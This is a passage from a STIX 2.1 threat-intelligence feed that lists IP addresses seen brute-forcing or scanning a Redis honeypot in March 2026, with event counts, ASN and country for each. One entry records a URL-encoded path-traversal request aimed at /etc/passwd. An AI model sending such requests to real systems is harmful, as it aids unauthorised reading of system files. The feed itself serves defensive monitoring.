      "modified": "2026-03-19T06:25:02.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '66.132.153.130']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-19T06:25:02.000Z",
      "valid_until": "2026-04-20T06:25:01.000Z"
    },
    {
      "created": "2026-03-19T10:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--4d8067a0-1d06-4334-be3a-080e5d4e6ce4",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-19T10:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '48.211.170.175']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-19T10:25:14.000Z",
      "valid_until": "2026-04-20T10:25:12.000Z"
    },
    {
      "created": "2026-03-19T11:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=23; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--7aff5843-ac0c-4fcc-9258-c912572f62e5",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-19T11:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '172.202.118.10']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-19T11:25:14.000Z",
      "valid_until": "2026-04-20T11:25:13.000Z"
    },
    {
      "created": "2026-03-19T12:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--78b36540-ea30-4a2a-8821-f21a28877b41",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-19T12:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '65.49.1.232']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-19T12:25:13.000Z",
      "valid_until": "2026-04-20T12:25:12.000Z"
    },
    {
      "created": "2026-03-19T12:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--f2c92e86-6835-4e9b-a46d-5b9cfd5c577c",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-19T12:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '65.49.1.240']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-19T12:25:13.000Z",
      "valid_until": "2026-04-20T12:25:12.000Z"
    },
    {
      "created": "2026-03-19T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0",
      "id": "indicator--40028492-09ff-4ae0-914d-1ef6cd8de2c4",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-19T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '192.155.84.194']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-19T13:25:13.000Z",
      "valid_until": "2026-04-20T13:25:12.000Z"
    },
    {
      "created": "2026-03-19T14:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398722; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--1a04471f-7e8d-4712-a8e6-eeb57baa389f",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-19T14:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '199.45.154.157']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-19T14:25:13.000Z",
      "valid_until": "2026-04-20T14:25:12.000Z"
    },
    {
      "created": "2026-03-19T14:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398722; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--5546d2da-7c64-4914-ad17-3be027aa844e",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-19T14:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '199.45.154.184']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-19T14:25:13.000Z",
      "valid_until": "2026-04-20T14:25:12.000Z"
    },
    {
      "created": "2026-03-19T15:25:02.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=17; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--ca4daefb-0f1c-4e63-8ed3-2eb11400902c",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-19T15:25:02.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '157.245.251.149']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-19T15:25:02.000Z",
      "valid_until": "2026-04-20T15:25:01.000Z"
    },
    {
      "created": "2026-03-19T15:25:02.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--590b73b4-dd15-4a87-9406-641706d3f8c0",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-19T15:25:02.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '159.65.223.199']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-19T15:25:02.000Z",
      "valid_until": "2026-04-20T15:25:01.000Z"
    },
    {
      "created": "2026-03-19T16:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=50; ports=6379; cc=GB; asn=135377; asn_org=UCLOUD INFORMATION TECHNOLOGY HK LIMITED; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--be6109af-f42b-4164-944e-7fc7bb6e9a57",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-19T16:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '165.154.174.206']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-19T16:25:13.000Z",
      "valid_until": "2026-04-20T16:25:12.000Z"
    },
    {
      "created": "2026-03-19T18:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--9e12e8de-8f46-4021-a9f1-332ae6547be0",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-19T18:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '13.86.116.162']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-19T18:25:13.000Z",
      "valid_until": "2026-04-20T18:25:12.000Z"
    },
    {
      "created": "2026-03-19T19:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0",
      "id": "indicator--6835e72c-6bea-49c4-9430-50478c37af8e",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-19T19:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '44.215.219.236']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-19T19:25:13.000Z",
      "valid_until": "2026-04-20T19:25:12.000Z"
    },
    {
      "created": "2026-03-19T20:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4811; asn_org=China Telecom Group; redis_cmd_hits=0",
      "id": "indicator--6d954b3f-2394-4438-88de-e0908089ba58",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-19T20:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '118.196.34.36']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-19T20:25:13.000Z",
      "valid_until": "2026-04-20T20:25:12.000Z"
    },
    {
      "created": "2026-03-19T20:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--5fca7435-7d56-4552-8551-3de2a1e046b6",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-19T20:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '162.142.125.144']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-19T20:25:13.000Z",
      "valid_until": "2026-04-20T20:25:12.000Z"
    },
    {
      "created": "2026-03-19T20:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--5067714c-96b1-4ce7-a6fc-c985c4fc9d0c",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-19T20:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '167.94.138.131']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-19T20:25:13.000Z",
      "valid_until": "2026-04-20T20:25:12.000Z"
    },
    {
      "created": "2026-03-19T20:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--d70dc23d-e9cf-4371-9011-d845b767f58c",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-19T20:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '66.132.153.139']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-19T20:25:13.000Z",
      "valid_until": "2026-04-20T20:25:12.000Z"
    },
    {
      "created": "2026-03-20T02:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--d1decf73-fd01-4397-baec-53595c226076",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-20T02:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '147.182.183.18']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-20T02:25:13.000Z",
      "valid_until": "2026-04-21T02:25:12.000Z"
    },
    {
      "created": "2026-03-20T02:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=PT; asn=21859; asn_org=Zenlayer Inc; redis_cmd_hits=0",
      "id": "indicator--9dc94619-493b-4d05-bfe3-9756db75dfbc",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-20T02:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '185.226.196.12']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-20T02:25:13.000Z",
      "valid_until": "2026-04-21T02:25:12.000Z"
    },
    {
      "created": "2026-03-20T02:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=PT; asn=21859; asn_org=Zenlayer Inc; redis_cmd_hits=0",
      "id": "indicator--43340de0-77df-41ec-88b0-4552b17b5c27",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-20T02:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '185.226.196.14']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-20T02:25:13.000Z",
      "valid_until": "2026-04-21T02:25:12.000Z"
    },
    {
      "created": "2026-03-20T02:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=GB; asn=211298; asn_org=Driftnet Ltd; redis_cmd_hits=0",
      "id": "indicator--8878fe06-4df9-46d0-8b0f-ffb103e8b3b6",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-20T02:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '193.163.125.8']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-20T02:25:13.000Z",
      "valid_until": "2026-04-21T02:25:12.000Z"
    },
    {
      "created": "2026-03-20T03:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=18; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--91eabbde-9dab-478e-a296-4aedbb46ba62",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-20T03:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '143.244.161.132']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-20T03:25:06.000Z",
      "valid_until": "2026-04-21T03:25:05.000Z"
    },
    {
      "created": "2026-03-20T03:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=21; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--bf9bb0f3-8531-4c23-9627-9f4b0edc829c",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-20T03:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '157.230.224.183']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-20T03:25:06.000Z",
      "valid_until": "2026-04-21T03:25:05.000Z"
    },
    {
      "created": "2026-03-20T04:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=ID; asn=136835; asn_org=PT. GLobal Intermedia Nusantara; redis_cmd_hits=0",
      "id": "indicator--4efdb4d8-3168-4c3e-be9a-de5efedf05c3",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-20T04:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '103.100.27.123']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-20T04:25:14.000Z",
      "valid_until": "2026-04-21T04:25:12.000Z"
    },
    {
      "created": "2026-03-20T05:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4811; asn_org=China Telecom Group; redis_cmd_hits=0",
      "id": "indicator--5bf1402a-bd71-42ff-a830-dfe3cdef25ab",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-20T05:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '14.103.198.15']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-20T05:25:13.000Z",
      "valid_until": "2026-04-21T05:25:12.000Z"
    },
    {
      "created": "2026-03-20T06:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=211607; asn_org=Securitytrails, LLC; redis_cmd_hits=0",
      "id": "indicator--10fb2dc7-0bea-442f-a889-73af673e3d7b",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-20T06:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '193.3.53.4']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-20T06:25:07.000Z",
      "valid_until": "2026-04-21T06:25:06.000Z"
    },
    {
      "created": "2026-03-20T07:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=8; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--3fae5f72-f97c-4390-af29-578fe17cacd3",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-20T07:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '205.210.31.236']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-20T07:25:14.000Z",
      "valid_until": "2026-04-21T07:25:14.000Z"
    },
    {
      "created": "2026-03-20T07:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--f2518f2b-b407-42b5-9c17-bfeb686f38a1",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-20T07:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '4.236.37.185']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-20T07:25:14.000Z",
      "valid_until": "2026-04-21T07:25:14.000Z"
    },
    {
      "created": "2026-03-20T12:25:12.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=11; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--fd2def5c-2485-430d-990d-c9c697064db2",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-20T12:25:12.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '47.111.178.32']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-20T12:25:12.000Z",
      "valid_until": "2026-04-21T12:25:11.000Z"
    },
    {
      "created": "2026-03-20T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0",
      "id": "indicator--b41f034b-f306-4e53-a2df-a592fda773ee",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-20T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '143.42.1.34']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-20T13:25:13.000Z",
      "valid_until": "2026-04-21T13:25:12.000Z"
    },
    {
      "created": "2026-03-20T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--20269cbc-71c8-49cd-9bbf-1cadfb6c63fd",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-20T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.169.107.229']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-20T13:25:13.000Z",
      "valid_until": "2026-04-21T13:25:12.000Z"
    },
    {
      "created": "2026-03-20T14:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=CA; asn=852; asn_org=TELUS Communications; redis_cmd_hits=0",
      "id": "indicator--ea3415f7-995e-4d64-a2f9-ba382cde44f4",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-20T14:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '66.183.88.112']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-20T14:25:07.000Z",
      "valid_until": "2026-04-21T14:25:06.000Z"
    },
    {
      "created": "2026-03-20T15:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--9625777e-b6e4-456b-b328-fdf3118163a2",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-20T15:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '101.201.124.141']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-20T15:25:14.000Z",
      "valid_until": "2026-04-21T15:25:12.000Z"
    },
    {
      "created": "2026-03-20T15:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--0cea0e6c-e34f-4a66-a345-343b9985fd21",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-20T15:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '65.49.20.101']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-20T15:25:14.000Z",
      "valid_until": "2026-04-21T15:25:12.000Z"
    },
    {
      "created": "2026-03-20T15:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--c3644ed9-3b81-4177-b57d-550a58eb3e17",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-20T15:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '65.49.20.69']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-20T15:25:14.000Z",
      "valid_until": "2026-04-21T15:25:12.000Z"
    },
    {
      "created": "2026-03-20T16:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=BO; asn=6568; asn_org=EMPRESA NACIONAL DE TELECOMUNICACIONES SOCIEDAD ANONIMA; redis_cmd_hits=0",
      "id": "indicator--09b3b58e-80c8-43e3-a9c6-5d0d36ff2237",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-20T16:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '181.115.186.122']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-20T16:25:13.000Z",
      "valid_until": "2026-04-21T16:25:12.000Z"
    },
    {
      "created": "2026-03-20T18:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=202425; asn_org=IP Volume inc; redis_cmd_hits=0",
      "id": "indicator--b1dfbf52-b04f-4737-8d7b-4d855e85417b",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-20T18:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '185.242.226.2']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-20T18:25:14.000Z",
      "valid_until": "2026-04-21T18:25:12.000Z"
    },
    {
      "created": "2026-03-20T18:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=19; ports=6379; cc=NL; asn=206264; asn_org=Amarutu Technology Ltd; cats=Generic Protocol Command Decode; redis_cmds=GET /..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1; redis_cmd_hits=0",
      "id": "indicator--1c1f6392-9f4d-4cd6-b996-f0617f154ddc",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-20T18:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '89.42.231.182']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-20T18:25:14.000Z",
      "valid_until": "2026-04-21T18:25:12.000Z"
    },
    {
      "created": "2026-03-20T20:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--829eba47-a798-4493-bed2-1bf53b27ec20",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-20T20:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '162.142.125.112']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-20T20:25:13.000Z",
      "valid_until": "2026-04-21T20:25:12.000Z"
    },
    {
      "created": "2026-03-20T21:25:04.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--0e5125a2-fb77-45bd-b5c3-f14ee16322c7",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-20T21:25:04.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '198.235.24.106']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-20T21:25:04.000Z",
      "valid_until": "2026-04-21T21:25:03.000Z"
    },
    {
